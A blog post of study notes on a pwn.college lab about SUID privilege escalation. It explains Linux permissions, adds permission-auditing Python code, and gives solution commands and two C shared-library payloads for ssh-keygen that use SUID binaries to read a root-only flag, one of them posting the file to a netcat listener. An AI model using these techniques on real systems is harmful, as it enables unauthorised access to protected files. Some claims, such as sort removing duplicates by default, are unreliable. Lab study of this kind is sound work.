
pwn.college Fundamental Program Misuse

Posted: 2024-03-28 20:33:05

Linux Command Line

ls -ld /some-path

The first character of the mode column is the file type:

  • -: regular file
  • d: directory
  • l: symbolic link
  • p: named pipe (FIFO)
  • c: character device file, hardware that provides a data stream
  • b: block device file, hardware that stores and loads blocks of data, e.g. a hard drive
  • s: unix socket

Note: symbolic links (soft links) to relative paths are relative to the directory containing the link (ln -s).

Hard link: another directory entry for the same inode, a valid reference to the original file (ln without -s).

Pipes:

  • unnamed pipes, e.g. cat a | md5sum
  • named pipes: FIFOs, created using mkfifo

Privilege Escalation

  • Every process has a UID and a GID.
  • Every file and directory is owned by a user and a group.
  • Child processes inherit their UID/GID from the parent.
  • UID 0 is root.
  • Running an SUID binary can elevate privileges.
  • If an SUID binary has a security problem, an attacker can use it in a privilege escalation attack.

SUID: execute with the eUID of the file owner rather than that of the parent process.

SGID: likewise with the eGID (the file's group owner rather than the original GID).

Sticky: on shared directories, limits file removal to the file owners.

Keywords:

  • Effective (eUID, eGID): the UID/GID used for most access checks.
  • Real UID/GID: used for things such as signal checks.
  • Saved UID/GID: a UID/GID that the process may switch its eUID/eGID back to, used to temporarily drop privileges.

Typical flow:

  1. Gain a foothold on the system (vulnerable network service, intended shell access, code running in an app context, etc.)
  2. Identify a vulnerable privileged service
  3. Exploit the privileged service to gain its privileges

Unnecessary sudo is common in shared server management software and in containerization.

OS-level vulnerabilities

Mitigations

Mitigations reduce but do not eliminate the potential for harm.

If /bin/sh is run as SUID (e.g. eUID == 0 but rUID != 0), it will drop privileges to the rUID.

To disable that, use sh -p.

Note: it is bash -p that keeps the elevated privilege; plain bash restricts itself by default.
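The credential rules above (SUID replacing the eUID on exec, the saved set-ID slot, and sh/bash resetting to the real IDs unless -p is given) as a small Python model, together with the real setresuid()/setresgid() drop a careful SUID program performs. This is an added example, not code from pwn.college or from the original notes; the names Creds, exec_credentials, shell_startup and drop_privileges_permanently are mine, and the model assumes no nosuid mount and no capabilities.

```python
"""Model of the credential rules in the notes above; added example, not
pwn.college's or the author's code.

exec_credentials() applies the SUID/SGID rule: on exec the effective and
saved IDs become the file's owner/group when the matching bit is set, and
the real IDs never change.  shell_startup() applies the sh/bash rule: a
process whose eUID differs from its rUID is reset to the real IDs unless
-p was given.  drop_privileges_permanently() is the real thing, the
setresgid()/setresuid() calls made once root is no longer needed.
Assumption of this model: no nosuid mount, no capabilities.
"""
import os
import stat
from typing import NamedTuple


class Creds(NamedTuple):
    ruid: int
    euid: int
    suid: int   # saved set-user-ID
    rgid: int
    egid: int
    sgid: int   # saved set-group-ID


def exec_credentials(proc: Creds, file_mode: int, file_uid: int, file_gid: int) -> Creds:
    """Credentials after exec()ing a file with the given st_mode and owner."""
    euid = file_uid if file_mode & stat.S_ISUID else proc.euid
    egid = file_gid if file_mode & stat.S_ISGID else proc.egid
    # the kernel copies the new effective IDs into the saved slots on exec
    return Creds(proc.ruid, euid, euid, proc.rgid, egid, egid)


def shell_startup(proc: Creds, privileged: bool = False) -> Creds:
    """sh/bash start-up: without -p (privileged=False) a real/effective
    mismatch is treated as accidental and the effective IDs are reset to
    the real ones; modern bash uses setresuid(), so the saved IDs go too."""
    if privileged:
        return proc
    if proc.euid != proc.ruid or proc.egid != proc.rgid:
        return Creds(proc.ruid, proc.ruid, proc.ruid, proc.rgid, proc.rgid, proc.rgid)
    return proc


def current_credentials() -> Creds:
    ruid, euid, suid = os.getresuid()
    rgid, egid, sgid = os.getresgid()
    return Creds(ruid, euid, suid, rgid, egid, sgid)


def drop_privileges_permanently() -> Creds:
    """Put the real IDs in all three slots so the privilege cannot be
    regained with seteuid().  Group first: after the UID is dropped the
    process may no longer be allowed to change its group."""
    ruid = os.getuid()
    rgid = os.getgid()
    os.setresgid(rgid, rgid, rgid)
    os.setresuid(ruid, ruid, ruid)
    after = current_credentials()
    assert after.euid == ruid and after.suid == ruid, "drop failed"
    return after


if __name__ == "__main__":
    user = Creds(1000, 1000, 1000, 1000, 1000, 1000)
    suid_root_cat = exec_credentials(user, 0o104755, 0, 0)   # -rwsr-xr-x root root
    print("after exec of an SUID-root binary:", suid_root_cat)
    print("eUID in bash, then in bash -p:",
          shell_startup(suid_root_cat).euid,
          shell_startup(suid_root_cat, privileged=True).euid)
    print("this process after dropping:", drop_privileges_permanently())
```

Running it as an ordinary user prints eUID 0 after the modelled exec, 1000 after a plain bash start-up and 0 again with -p; the final line shows the live process with all three UID slots equal, which is the state an SUID program should reach before it touches untrusted input.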

e.g.: Wireshark needs root privileges to sniff network traffic, but it also contains a great many protocol parsers, which presents a large attack surface.

Mitigation: split the sniffing part out into a separate program, dumpcap.

General approach: sandboxing
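The "unnecessary set-ID binaries" problem is easiest to catch with a periodic audit. The following Python script is an added example (not pwn.college's or the author's code): it walks a tree, reports every regular file with SUID or SGID set and flags the ones whose name is among the programs these notes later show reading or writing a root-only file once they are SUID. RISKY_SETID_NAMES is built from that exercise list; the function and class names are mine.

```python
"""Set-ID audit helper, added as an example; not part of the pwn.college material.

find_setid_files() walks a directory tree with lstat() (symlinks are never
followed), keeps every regular file carrying the SUID or SGID bit and marks
the ones whose name matches a program the exercises in these notes misuse
once it is SUID.  Point it at "/" on a host or an unpacked container image
to review what is set-ID and whether it needs to be.
"""
import os
import re
import stat
from typing import List, NamedTuple

# Names taken from the exercise list in these notes: once SUID, each of
# these can read (or write) a root-only file.  Any other set-ID file is
# still reported, just without the risky flag.
RISKY_SETID_NAMES = frozenset({
    "cat", "more", "less", "tail", "head", "sort",
    "vim", "emacs", "nano",
    "rev", "od", "hd", "xxd", "base32", "base64", "split",
    "gzip", "bzip2", "tar", "zip", "ar", "cpio", "genisoimage",
    "env", "find", "make", "nice", "timeout", "stdbuf", "setarch", "watch", "socat",
    "whiptail", "awk", "sed", "ed",
    "chown", "chmod", "cp", "mv",
    "perl", "python", "ruby", "bash",
    "date", "dmesg", "wc", "gcc", "as", "wget", "ssh-keygen",
})

_VERSION_SUFFIX = re.compile(r"[-.\d]+$")   # python3.10 -> python, gcc-12 -> gcc


class SetIdFile(NamedTuple):
    path: str
    mode: str       # four-digit octal, e.g. "4755"
    owner_uid: int
    risky: bool


def is_risky_name(name: str) -> bool:
    """True when the basename, or the basename minus a version suffix,
    is one of the programs the exercises misuse."""
    return name in RISKY_SETID_NAMES or _VERSION_SUFFIX.sub("", name) in RISKY_SETID_NAMES


def find_setid_files(root: str) -> List[SetIdFile]:
    found: List[SetIdFile] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:            # unreadable entry: skip it, keep walking
                continue
            if not stat.S_ISREG(st.st_mode):
                continue               # only regular files honour set-ID bits
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            found.append(SetIdFile(
                path=path,
                mode=format(stat.S_IMODE(st.st_mode), "04o"),
                owner_uid=st.st_uid,
                risky=is_risky_name(name),
            ))
    return sorted(found)


def report(root: str = "/") -> int:
    """Print one line per set-ID file; return how many were flagged risky."""
    files = find_setid_files(root)
    risky = 0
    for f in files:
        tag = "RISKY" if f.risky else "     "
        print(f"{tag} {f.mode} uid={f.owner_uid} {f.path}")
        risky += f.risky
    return risky


if __name__ == "__main__":
    import sys
    report(sys.argv[1] if len(sys.argv) > 1 else "/")
```

The list is a review aid, not a verdict: a flagged entry means "this program reads or writes files on the caller's behalf, so it must not be set-ID unless something confines it" (the dumpcap split above is the pattern to reach for), while an unflagged entry still deserves a look at why it carries the bit at all.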

sid (set-ID bits)

chmod WhoWhatWhich file | directory

Where:

  • Who - identities: u, g, o, a (user, group, other, all)
  • What - actions: +, -, = (add, remove, set exact)
  • Which - access levels: r, w, x (read, write, execute)

e.g.:

chmod 650 test.txt

x is execute, while s is special.

SUID allows any user to run the file with the file owner's privileges.

A file with SUID always executes as the user who owns the file, regardless of the user passing the command.

SGID: on a file, it lets the file run with the privileges of the group that owns it. On a directory, any file created inside it is automatically group-owned by the directory's group owner.

sticky bit: shown as t; it does not affect execution of the file, but only the owner of a file and root can delete that file.

[tcarrigan@server article_submissions]$ ls -ld /tmp/
drwxrwxrwt. 15 root root 4096 Sep 22 15:28 /tmp/

It seems that the extra letter here (the t at the end) means the special bits (the X digit) are not all zero.

How to set it:

chmod g+s community_content/

Numeric method: prefix the usual three digits with an X digit:

  • Start at 0
  • SUID = 4
  • SGID = 2
  • Sticky = 1

chmod X### file | directory

e.g.:

[tcarrigan@server article_submissions]$ chmod 2770 community_content/
[tcarrigan@server article_submissions]$ ls -ld community_content/
drwxrws---. 2 tcarrigan tcarrigan 113 Apr  7 11:32 community_content/
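To make the s/S/t letters and the leading X digit concrete, here is an added Python example (not from the original notes) that builds the ls -l mode column, the four-digit chmod value and the special digit from a st_mode, and applies a symbolic WhoWhatWhich expression such as g+s. mode_string() is the same mapping the standard library's stat.filemode() implements, spelled out to show where each letter comes from; apply_symbolic() is my own simplified model that ignores the umask and GNU chmod's special treatment of set-ID bits on directories.

```python
"""ls-style mode column, numeric chmod value and symbolic chmod expressions,
built from a st_mode value; added example, not from the original notes.
mode_string() is the mapping stat.filemode() implements, spelled out here
to show where s/S/t/T come from.  apply_symbolic() handles u,g,o,a with
+,-,= and r,w,x,s,t; it ignores the umask and GNU chmod's special handling
of set-ID bits on directories (assumptions of this model).
"""
import os
import stat

TYPE_LETTERS = {
    stat.S_IFREG: "-", stat.S_IFDIR: "d", stat.S_IFLNK: "l", stat.S_IFIFO: "p",
    stat.S_IFCHR: "c", stat.S_IFBLK: "b", stat.S_IFSOCK: "s",
}

# (read bit, write bit, exec bit, special bit, letter shown in the exec slot)
_TRIPLETS = (
    (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_ISUID, "s"),
    (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP, stat.S_ISGID, "s"),
    (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH, stat.S_ISVTX, "t"),
)


def mode_string(mode: int) -> str:
    """e.g. 0o42770 -> 'drwxrws---'.  A special bit shows as s/t when the
    exec bit is also set and as S/T (special but not executable) when not."""
    out = [TYPE_LETTERS.get(stat.S_IFMT(mode), "?")]
    for r, w, x, special, letter in _TRIPLETS:
        out.append("r" if mode & r else "-")
        out.append("w" if mode & w else "-")
        if mode & special:
            out.append(letter if mode & x else letter.upper())
        else:
            out.append("x" if mode & x else "-")
    return "".join(out)


def special_digit(mode: int) -> int:
    """The leading X of chmod X###: SUID = 4, SGID = 2, sticky = 1."""
    return ((4 if mode & stat.S_ISUID else 0)
            + (2 if mode & stat.S_ISGID else 0)
            + (1 if mode & stat.S_ISVTX else 0))


def octal_mode(mode: int) -> str:
    """Four-digit form as chmod takes it, e.g. 0o42770 -> '2770'."""
    return format(stat.S_IMODE(mode), "04o")


_WHO_MASK = {"u": 0o4700, "g": 0o2070, "o": 0o1007}
_WHO_MASK["a"] = _WHO_MASK["u"] | _WHO_MASK["g"] | _WHO_MASK["o"]
_PERM_BITS = {"r": 0o444, "w": 0o222, "x": 0o111, "s": 0o6000, "t": 0o1000}


def apply_symbolic(mode: int, expr: str) -> int:
    """Apply a chmod WhoWhatWhich expression such as 'g+s' or 'u=rwx,o-r'."""
    perm = stat.S_IMODE(mode)
    for clause in expr.split(","):
        i = 0
        while i < len(clause) and clause[i] in "ugoa":
            i += 1
        if i >= len(clause) or clause[i] not in "+-=":
            raise ValueError(f"bad chmod clause: {clause!r}")
        mask = 0
        for w in clause[:i] or "a":          # no Who given means all
            mask |= _WHO_MASK[w]
        bits = 0
        for ch in clause[i + 1:]:
            bits |= _PERM_BITS[ch]
        bits &= mask                         # 's' is SUID for u, SGID for g, nothing for o
        op = clause[i]
        if op == "+":
            perm |= bits
        elif op == "-":
            perm &= ~bits
        else:
            perm = (perm & ~mask) | bits
    return (mode & ~0o7777) | perm


def describe(path: str) -> str:
    """ls -ld style summary for a real path, without following symlinks."""
    st = os.lstat(path)
    return f"{mode_string(st.st_mode)} {octal_mode(st.st_mode)} {path}"


if __name__ == "__main__":
    print(describe("/tmp"))                                  # drwxrwxrwt 1777 /tmp
    m = apply_symbolic(stat.S_IFDIR | 0o770, "g+s")          # the community_content/ example
    print(mode_string(m), octal_mode(m), special_digit(m))   # drwxrws--- 2770 2
```

The capital S/T case is the one worth remembering when reading listings: a file showing -rwSr--r-- has the SUID bit set but is not executable by its owner, which usually means a chmod typo rather than a deliberate set-ID program.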

Exercises:

  1. Levels 1-6: after running the challenge you can simply read the flag. Q: how? Isn't the flag still readable only by root??
  • The challenge sets the SUID bit on /usr/bin/cat, more, less, tail, head and sort

sort is a very commonly used Linux command for sorting. Focus, and sort takes five minutes to master, starting now! sort treats each line of a file as a unit and compares the lines with each other, from the first character onwards by ASCII value, then outputs them in ascending order. Its job is very simple: it removes duplicate lines from the output.

  2. Levels 7-9: focus on SUID editors: vim, emacs, nano

  3. Levels 10-16: Level 10 is rev, which reverses the content of a file

  • Level 11: od. "Write an unambiguous representation, octal bytes by default, of FILE to standard output."

od -c /flag | sed 's/[[:space:]]//g' | sed 's/^.\{7\}//g' | tr '\n' ' ' | sed 's/[[:space:]]//g'
od -c /flag | sed 's/[[:space:]]//g' | sed 's/^.\{7\}//g'

  • Level 12: hd
  • Level 13: xxd
  • Level 14: base32, base64
  • Level 16: split

  4. Levels 17-23: archive formats
  • gzip, bzip2, tar, zip, ar, cpio, genisoimage
  • Note that some archives keep the original permissions after extraction; in that case use options such as -c, -O or p to print the content to stdout instead
  • cpio's input is a file containing a list of file names, not the list itself. cpio tries to put files back at their absolute paths. cpio can change a file's user ownership:

    echo "/flag" > 1.txt
    cpio -R hacker -p tmpdir < 1.txt

  • Worth studying:

    tar -Oxf /flag.tar
    ar rc /flag.a /flag
    echo "/flag" | cpio -o

  • genisoimage strips whatever exceeds your permissions when you add a file directly, but it does not apply that protection when it reads a file as a rule file:

genisoimage --sort /flag

  5. Levels 24-32: programs that execute other commands

env DEBUG=1 cat /flag
find / -name *lag -exec cat {} \;
printf "a:\ncat \\\flag" > tmp.makefile
make -f tmp.makefile a
nice -n 1 cat /flag
timeout 1 cat /flag
stdbuf -o L cat /flag
setarch --addr-no-randomize cat /flag
watch -x -b cat /flag
socat -u file:/flag file:1.txt

  • With make I first thought --eval would not work; the argument is probably preprocessed (by the shell) before it reaches make
  • socat establishes two bidirectional byte streams and transfers data between them.

  6. Levels 33-36

whiptail --textbox /flag 10 100
awk '{print}' /flag
sed "/[[:space:]]/d" /flag
ed -G /flag  # then press p

  • whiptail --yesno "hello" 10 10: whiptail is the clickable message box that appears in the terminal
  • ed is an editor

  7. Levels 37-41

chown hacker /flag
chmod 777 /flag
cp /flag 1.txt
/challenge/babysuid_level40 && mv /usr/bin/cat /usr/bin/mv && mv /flag

  • Level 40 actually requires running babysuid several times to set SUID on whatever binary /usr/bin/mv currently points at

  8. Levels 41-44: perl, python, ruby, bash

Note that it is bash -p that keeps the elevated privilege; plain bash does not.

  9. Levels 45-49: date, dmesg (Display or control the kernel ring buffer.), wc, gcc, as

gcc -S -x c /flag

  10. Level 50: I used wget -i /flag and got a decoy flag, but you can also use wget --header="Content-type: multipart/form-data boundary=FILEUPLOAD" --post-file flag http://127.0.0.1:4554/ with nc -lvnp 4554 in another terminal. Not sure why, but when both commands are in one terminal with nc in the background there is no output; maybe I typed something wrong. The reason -i cannot be used is that the flag contains both upper- and lower-case letters, and wget converts the upper-case letters to lower case.

  11. Level 51: ssh-keygen's FIDO library


#include <stdio.h>

/* ssh-keygen -w loads this shared object as a security-key (FIDO) provider
 * and calls sk_api_version() first; since the binary is SUID, the code
 * inside runs with the elevated eUID. */
int sk_api_version(void) {
    FILE *fp, *fp2;
    char buffer[1024];
    size_t n;

    fp = fopen("/flag", "r");
    fp2 = fopen("flag.bk", "w");
    if (fp == NULL || fp2 == NULL)
        return 0;
    /* copy only the bytes actually read instead of a fixed 1024 */
    n = fread(buffer, 1, sizeof buffer, fp);
    fwrite(buffer, 1, n, fp2);
    fclose(fp);
    fclose(fp2);
    printf("Constructor function executed.\n");
    return 0;
}

gcc liba.c -shared -fPIC -o liba.so
ssh-keygen -vvvv -t ecdsa-sk -w ./liba.so

After looking at a blog post I found another method using ssh-keygen -D. The blog also said that system() cannot be used to run the euid-elevated operation.


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/sendfile.h>

/* ssh-keygen -D loads this file as a PKCS#11 provider and looks up the
 * symbol C_GetFunctionList; an exported object with that name is enough
 * for the lookup to succeed.  The constructor runs when the library is
 * loaded, before ssh-keygen calls anything in it. */
char C_GetFunctionList[2014] = "C_GetFunctionList";

__attribute__((constructor)) void sth(void) {
    /* copy the file straight to stdout (fd 1) with sendfile(2) */
    sendfile(1, open("/flag", O_RDONLY), 0, 4096);
}

ssh-keygen -D /home/hacker/libb.so

From: https://www.cnblogs.com/xuesu/p/18102564
